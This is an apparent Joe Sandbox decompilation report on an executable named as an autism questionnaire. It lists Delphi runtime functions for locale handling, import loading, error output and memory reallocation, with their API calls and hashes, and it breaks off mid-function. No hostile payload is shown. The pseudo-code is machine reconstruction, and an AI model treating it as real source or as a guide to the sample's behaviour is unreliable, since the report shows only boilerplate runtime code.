                                                                                              • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                                                              • API String ID: 233154393-2808312488
                                                                                              • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                              • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                                              • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                              • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                              				char _v8;
                                                                                              				void* _t18;
                                                                                              				signed short _t28;
                                                                                              				intOrPtr _t35;
                                                                                              				intOrPtr* _t44;
                                                                                              				intOrPtr _t47;
                                                                                              
                                                                                              				_t42 = __edi;
                                                                                              				_push(0);
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_t44 = __edx;
                                                                                              				_t28 = __eax;
                                                                                              				_push(_t47);
                                                                                              				_push(0x40a8e8);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t47;
                                                                                              				EnterCriticalSection(0x4bdc10);
                                                                                              				if(_t28 !=  *0x4bdc28) {
                                                                                              					LeaveCriticalSection(0x4bdc10);
                                                                                              					E00407A20(_t44);
                                                                                              					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                                                              						if( *0x4bdc0c == 0) {
                                                                                              							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
                                                                                              							L00403738();
                                                                                              							if(_t28 != _t18) {
                                                                                              								if( *_t44 != 0) {
                                                                                              									_t18 = E004086E4(_t44, E0040A900);
                                                                                              								}
                                                                                              								L00403738();
                                                                                              								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
                                                                                              								E004086E4(_t44, _v8);
                                                                                              							}
                                                                                              						} else {
                                                                                              							E0040A6C8(_t28, _t44);
                                                                                              						}
                                                                                              					}
                                                                                              					EnterCriticalSection(0x4bdc10);
                                                                                              					 *0x4bdc28 = _t28;
                                                                                              					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
                                                                                              					LeaveCriticalSection(0x4bdc10);
                                                                                              				} else {
                                                                                              					E0040858C(_t44, 0x55, 0x4bdc2a);
                                                                                              					LeaveCriticalSection(0x4bdc10);
                                                                                              				}
                                                                                              				_pop(_t35);
                                                                                              				 *[fs:eax] = _t35;
                                                                                              				_push(E0040A8EF);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}










                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                                                              • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                                                              • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                                                              • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                                                              • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                                                              • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                              • String ID: en-US,en,
                                                                                              • API String ID: 975949045-3579323720
                                                                                              • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                              • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                                                              • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                              • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 61%
                                                                                              			E0042301C(void* __ebx, void* __esi, void* __eflags) {
                                                                                              				char _v8;
                                                                                              				void* _v12;
                                                                                              				char _v16;
                                                                                              				char _v20;
                                                                                              				intOrPtr* _t21;
                                                                                              				intOrPtr _t61;
                                                                                              				void* _t68;
                                                                                              
                                                                                              				_push(__ebx);
                                                                                              				_v20 = 0;
                                                                                              				_v8 = 0;
                                                                                              				_push(_t68);
                                                                                              				_push(0x423116);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t68 + 0xfffffff0;
                                                                                              				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
                                                                                              				if(_t21 == 0) {
                                                                                              					if(E0041FF2C() != 2) {
                                                                                              						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
                                                                                              							E00422FE8();
                                                                                              							RegCloseKey(_v12);
                                                                                              						}
                                                                                              					} else {
                                                                                              						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
                                                                                              							E00422FE8();
                                                                                              							RegCloseKey(_v12);
                                                                                              						}
                                                                                              					}
                                                                                              					E0040873C( &_v20, _v8, 0x42322c);
                                                                                              					E00405920(_v20,  &_v16);
                                                                                              					if(_v16 != 0) {
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *_t21();
                                                                                              				}
                                                                                              				_pop(_t61);
                                                                                              				 *[fs:eax] = _t61;
                                                                                              				_push(E0042311D);
                                                                                              				E00407A20( &_v20);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}











                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                              • API String ID: 4190037839-2401316094
                                                                                              • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                              • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                                                              • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                              • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                              				long _v8;
                                                                                              				signed int _v12;
                                                                                              				long _v16;
                                                                                              				void* _v20;
                                                                                              				long _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				struct HINSTANCE__** _v48;
                                                                                              				CHAR* _v52;
                                                                                              				void _v56;
                                                                                              				long _v60;
                                                                                              				_Unknown_base(*)()* _v64;
                                                                                              				struct HINSTANCE__* _v68;
                                                                                              				CHAR* _v72;
                                                                                              				signed int _v76;
                                                                                              				CHAR* _v80;
                                                                                              				intOrPtr* _v84;
                                                                                              				void* _v88;
                                                                                              				void _v92;
                                                                                              				signed int _t104;
                                                                                              				signed int _t106;
                                                                                              				signed int _t108;
                                                                                              				long _t113;
                                                                                              				intOrPtr* _t119;
                                                                                              				void* _t124;
                                                                                              				void _t126;
                                                                                              				long _t128;
                                                                                              				struct HINSTANCE__* _t142;
                                                                                              				long _t166;
                                                                                              				signed int* _t190;
                                                                                              				_Unknown_base(*)()* _t191;
                                                                                              				void* _t194;
                                                                                              				intOrPtr _t196;
                                                                                              
                                                                                              				_push(_a4);
                                                                                              				memcpy( &_v56, 0x4b7c40, 8 << 2);
                                                                                              				_pop(_t194);
                                                                                              				_v56 =  *0x4b7c40;
                                                                                              				_v52 = E0040D6C8( *0x004B7C44);
                                                                                              				_v48 = E0040D6D8( *0x004B7C48);
                                                                                              				_v44 = E0040D6E8( *0x004B7C4C);
                                                                                              				_v40 = E0040D6F8( *0x004B7C50);
                                                                                              				_v36 = E0040D6F8( *0x004B7C54);
                                                                                              				_v32 = E0040D6F8( *0x004B7C58);
                                                                                              				_v28 =  *0x004B7C5C;
                                                                                              				memcpy( &_v92, 0x4b7c60, 9 << 2);
                                                                                              				_t196 = _t194;
                                                                                              				_v88 = 0x4b7c60;
                                                                                              				_v84 = _a8;
                                                                                              				_v80 = _v52;
                                                                                              				if((_v56 & 0x00000001) == 0) {
                                                                                              					_t166 =  *0x4b7c84; // 0x0
                                                                                              					_v8 = _t166;
                                                                                              					_v8 =  &_v92;
                                                                                              					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t104 = _a8 - _v44;
                                                                                              				_t142 =  *_v48;
                                                                                              				if(_t104 < 0) {
                                                                                              					_t104 = _t104 + 3;
                                                                                              				}
                                                                                              				_v12 = _t104 >> 2;
                                                                                              				_t106 = _v12;
                                                                                              				_t190 = (_t106 << 2) + _v40;
                                                                                              				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                                                              				_v76 = _t108;
                                                                                              				if(_t108 == 0) {
                                                                                              					_v72 =  *_t190 & 0x0000ffff;
                                                                                              				} else {
                                                                                              					_v72 = E0040D708( *_t190) + 2;
                                                                                              				}
                                                                                              				_t191 = 0;
                                                                                              				if( *0x4be640 == 0) {
                                                                                              					L10:
                                                                                              					if(_t142 != 0) {
                                                                                              						L25:
                                                                                              						_v68 = _t142;
                                                                                              						if( *0x4be640 != 0) {
                                                                                              							_t191 =  *0x4be640(2,  &_v92);
                                                                                              						}
                                                                                              						if(_t191 != 0) {
                                                                                              							L36:
                                                                                              							if(_t191 == 0) {
                                                                                              								_v60 = GetLastError();
                                                                                              								if( *0x4be644 != 0) {
                                                                                              									_t191 =  *0x4be644(4,  &_v92);
                                                                                              								}
                                                                                              								if(_t191 == 0) {
                                                                                              									_t113 =  *0x4b7c8c; // 0x0
                                                                                              									_v24 = _t113;
                                                                                              									_v24 =  &_v92;
                                                                                              									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                                                              									_t191 = _v64;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L41;
                                                                                              						} else {
                                                                                              							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                                                              								L35:
                                                                                              								_t191 = GetProcAddress(_t142, _v72);
                                                                                              								goto L36;
                                                                                              							} else {
                                                                                              								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                                                              								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                                                              									goto L35;
                                                                                              								} else {
                                                                                              									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                                                              									if(_t191 == 0) {
                                                                                              										goto L35;
                                                                                              									}
                                                                                              									L41:
                                                                                              									 *_a8 = _t191;
                                                                                              									goto L42;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					if( *0x4be640 != 0) {
                                                                                              						_t142 =  *0x4be640(1,  &_v92);
                                                                                              					}
                                                                                              					if(_t142 == 0) {
                                                                                              						_t142 = LoadLibraryA(_v80);
                                                                                              					}
                                                                                              					if(_t142 != 0) {
                                                                                              						L20:
                                                                                              						if(_t142 == E0040CBA0(_v48, _t142)) {
                                                                                              							FreeLibrary(_t142);
                                                                                              						} else {
                                                                                              							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                                                              								_t124 = LocalAlloc(0x40, 8);
                                                                                              								_v20 = _t124;
                                                                                              								if(_t124 != 0) {
                                                                                              									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                                                              									_t126 =  *0x4b7c3c; // 0x0
                                                                                              									 *_v20 = _t126;
                                                                                              									 *0x4b7c3c = _v20;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						goto L25;
                                                                                              					} else {
                                                                                              						_v60 = GetLastError();
                                                                                              						if( *0x4be644 != 0) {
                                                                                              							_t142 =  *0x4be644(3,  &_v92);
                                                                                              						}
                                                                                              						if(_t142 != 0) {
                                                                                              							goto L20;
                                                                                              						} else {
                                                                                              							_t128 =  *0x4b7c88; // 0x0
                                                                                              							_v16 = _t128;
                                                                                              							_v16 =  &_v92;
                                                                                              							RaiseException(0xc06d007e, 0, 1,  &_v16);
                                                                                              							return _v64;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t191 =  *0x4be640(0,  &_v92);
                                                                                              					if(_t191 == 0) {
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						L42:
                                                                                              						if( *0x4be640 != 0) {
                                                                                              							_v60 = 0;
                                                                                              							_v68 = _t142;
                                                                                              							_v64 = _t191;
                                                                                              							 *0x4be640(5,  &_v92);
                                                                                              						}
                                                                                              						return _t191;
                                                                                              					}
                                                                                              				}
                                                                                              			}








































                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                              • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                                              • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                              • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E004047B0(int __eax, void* __ecx, void* __edx) {
                                                                                              				long _v12;
                                                                                              				int _t4;
                                                                                              				long _t7;
                                                                                              				void* _t11;
                                                                                              				long _t12;
                                                                                              				void* _t13;
                                                                                              				long _t18;
                                                                                              
                                                                                              				_t4 = __eax;
                                                                                              				_t24 = __edx;
                                                                                              				_t20 = __eax;
                                                                                              				if( *0x4bb058 == 0) {
                                                                                              					_push(0x2010);
                                                                                              					_push(__edx);
                                                                                              					_push(__eax);
                                                                                              					_push(0);
                                                                                              					L00403780();
                                                                                              				} else {
                                                                                              					_t7 = E00407EF0(__edx);
                                                                                              					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
                                                                                              					_t11 =  *0x4b7078; // 0x403920
                                                                                              					_t12 = E00407EF0(_t11);
                                                                                              					_t13 =  *0x4b7078; // 0x403920
                                                                                              					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                                                              					_t18 = E00407EF0(_t20);
                                                                                              					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                                                              				}
                                                                                              				return _t4;
                                                                                              			}











                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                                              • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: 9@
                                                                                              • API String ID: 3320372497-3209974744
                                                                                              • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                              • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                                              • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                              • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 62%
                                                                                              			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				char* _v8;
                                                                                              				long _v12;
                                                                                              				short _v140;
                                                                                              				short _v2188;
                                                                                              				void* _t15;
                                                                                              				char* _t17;
                                                                                              				intOrPtr _t19;
                                                                                              				intOrPtr _t30;
                                                                                              				long _t48;
                                                                                              				intOrPtr _t56;
                                                                                              				intOrPtr _t57;
                                                                                              				int _t61;
                                                                                              				void* _t64;
                                                                                              
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_v8 = 0;
                                                                                              				_push(_t64);
                                                                                              				_push(0x41f219);
                                                                                              				_push( *[fs:ecx]);
                                                                                              				 *[fs:ecx] = _t64 + 0xfffff778;
                                                                                              				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
                                                                                              				_t17 =  *0x4ba6c0; // 0x4bb058
                                                                                              				if( *_t17 == 0) {
                                                                                              					_t19 =  *0x4ba4f8; // 0x40e710
                                                                                              					_t11 = _t19 + 4; // 0xffed
                                                                                              					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
                                                                                              					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
                                                                                              				} else {
                                                                                              					_t30 =  *0x4ba524; // 0x4bb340
                                                                                              					E00405564(E00405820(_t30));
                                                                                              					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
                                                                                              					_push(_t48);
                                                                                              					E00409C00();
                                                                                              					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
                                                                                              					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
                                                                                              					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
                                                                                              				}
                                                                                              				_pop(_t56);
                                                                                              				 *[fs:eax] = _t56;
                                                                                              				_push(0x41f220);
                                                                                              				_t57 =  *0x41f0c4; // 0x41f0c8
                                                                                              				return E00409D24( &_v8, _t57);
                                                                                              			}

















                                                                                              APIs
                                                                                                • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                                • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                                • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                                • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                                              • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                                              • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                                              • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 135118572-0
                                                                                              • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                              • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                                              • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                              • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
                                                                                              				signed int __ebx;
                                                                                              				void* __esi;
                                                                                              				signed int _t69;
                                                                                              				signed int _t78;
                                                                                              				signed int _t93;
                                                                                              				long _t94;
                                                                                              				void* _t100;
                                                                                              				signed int _t102;
                                                                                              				signed int _t109;
                                                                                              				signed int _t115;
                                                                                              				signed int _t123;
                                                                                              				signed int _t129;
                                                                                              				void* _t131;
                                                                                              				signed int _t140;
                                                                                              				unsigned int _t148;
                                                                                              				signed int _t150;
                                                                                              				long _t152;
                                                                                              				signed int _t156;
                                                                                              				intOrPtr _t161;
                                                                                              				signed int _t166;
                                                                                              				signed int _t170;
                                                                                              				unsigned int _t171;
                                                                                              				intOrPtr _t174;
                                                                                              				intOrPtr _t192;
                                                                                              				signed int _t195;
                                                                                              				signed int _t196;
                                                                                              				signed int _t197;
                                                                                              				void* _t205;
                                                                                              				unsigned int _t207;
                                                                                              				intOrPtr _t213;
                                                                                              				void* _t225;
                                                                                              				intOrPtr _t227;
                                                                                              				void* _t228;
                                                                                              				signed int _t230;
                                                                                              				void* _t232;
                                                                                              				signed int _t233;
                                                                                              				signed int _t234;
                                                                                              				signed int _t238;
                                                                                              				signed int _t241;
                                                                                              				void* _t243;
                                                                                              				intOrPtr* _t244;
                                                                                              
                                                                                              				_t176 = __edx;
                                                                                              				_t66 = __eax;
                                                                                              				_t166 =  *(__eax - 4);
                                                                                              				_t217 = __eax;
                                                                                              				if((_t166 & 0x00000007) != 0) {
                                                                                              					__eflags = _t166 & 0x00000005;
                                                                                              					if((_t166 & 0x00000005) != 0) {
                                                                                              						_pop(_t217);
                                                                                              						_pop(_t145);
                                                                                              						__eflags = _t166 & 0x00000003;
                                                                                              						if((_t166 & 0x00000003) == 0) {
                                                                                              							_push(_t145);
                                                                                              							_push(__eax);
                                                                                              							_push(__edi);
                                                                                              							_push(_t225);
                                                                                              							_t244 = _t243 + 0xffffffe0;
                                                                                              							_t218 = __edx;
                                                                                              							_t202 = __eax;
                                                                                              							_t69 =  *(__eax - 4);
                                                                                              							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                                                              							if(0xfffffff0 >= __edx) {
                                                                                              								__eflags = __edx - _t148 >> 1;
                                                                                              								if(__edx < _t148 >> 1) {
                                                                                              									_t150 = E00403EE8(__edx);
                                                                                              									__eflags = _t150;
                                                                                              									if(_t150 != 0) {
                                                                                              										__eflags = _t218 - 0x40a2c;
                                                                                              										if(_t218 > 0x40a2c) {
                                                                                              											_t78 = _t202 - 0x10;
                                                                                              											__eflags = _t78;
                                                                                              											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                                                              										}
                                                                                              										E00403AA4(_t202, _t218, _t150);
                                                                                              										E0040426C(_t202, _t202, _t225);
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t150 = __eax;
                                                                                              									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                                                              								}
                                                                                              							} else {
                                                                                              								if(0xfffffff0 <= __edx) {
                                                                                              									_t227 = __edx;
                                                                                              								} else {
                                                                                              									_t227 = 0xbadb9d;
                                                                                              								}
                                                                                              								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
